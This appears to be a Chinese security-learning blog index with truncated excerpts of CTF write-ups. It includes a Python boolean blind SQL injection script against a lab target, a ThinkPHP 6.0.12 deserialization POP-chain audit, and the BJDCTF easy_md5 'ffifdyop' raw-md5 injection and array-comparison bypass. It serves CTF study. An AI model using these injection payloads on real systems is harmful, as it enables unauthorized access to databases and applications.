python脚本与xss入门
python脚本编写request库中带有get,post等方法,可以发送http请求,脚本编写中经常调用这个库
如:x = requests.get(url,params)
这样调用请求后,同时也会返回一个response对象,其中包含响应信息
123print(response.status_code) # 获取响应状态码print(response.headers) # 获取响应头print(response.content) # 获取响应内容
调用的一般形式为
123requests.get(url,params,args)requests.post(url,data={...},json={...},args)
其中data内的内容使用键值对传递
这就是request库的常见使用方式,我们还经常使用re库,用以正则匹配
使用方法
12re.match(pattern, string, flags=0)re.match(pattern, string, flags=0)
pattern:匹配的正则表达式
string ...
学习记录7-18
[CISCN2019 华北赛区 Day2 Web1]Hack World 1布尔盲注与python脚本编写
1’测试发现是布尔盲注
根据提示,所需在flag字段flag表,fuzz发现过滤空格,没有过滤括号,括号绕过空格,二分法布尔盲注
采用异或运算
参考:https://cloud.tencent.com/developer/article/2368996
123456789101112131415161718192021import requestsimport timeimport reurl='http://2d07b3c2-996f-4376-a1b6-c2d8b13426d4.node5.buuoj.cn:81/'flag = ''for i in range(1,50): max = 127 min = 0 for c in range(0,127): s = (int)((max+min)/2) payload = '0^(ascii(substr((select(flag ...
php反序列化代码审计
[CISCN 2022 初赛]ezpopThinkPHP V6.0.12LTS 反序列化漏洞
dirsearch扫描发现源码泄露
在www/vendor/topthink/think-orm下,有__destruct入口
接下来跟进save方法
1234567891011121314151617181920212223public function save(array $data = [], string $sequence = null): bool { $this->setAttrs($data); if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) { return false; }//需要绕过这个条件 $result = $this->exists ? $this->updateData() : $thi ...
学习记录24-7-10
学习记录[BJDCTF 2020]easy_md5进入可以看到查询框
查询框随便发点内容可以看到hint: select * from ‘admin’ where password=md5($pass,true)
true参数说明函数以二进制形式返回
payload: url?password=ffifdyop
ffifdyop经md5加密并转换为字符串变为’or’6…
select * from admin where password = ‘’ or ‘6…’
值为true,实现了sql注入
重定向,申码
1234567<!--$a = $GET['a'];$b = $_GET['b'];if($a != $b && md5($a) == md5($b)){ header('Location: levell14.php');-->
数组绕过即可
?a[]=1&b[]=2
访问level1114.php
12345 ...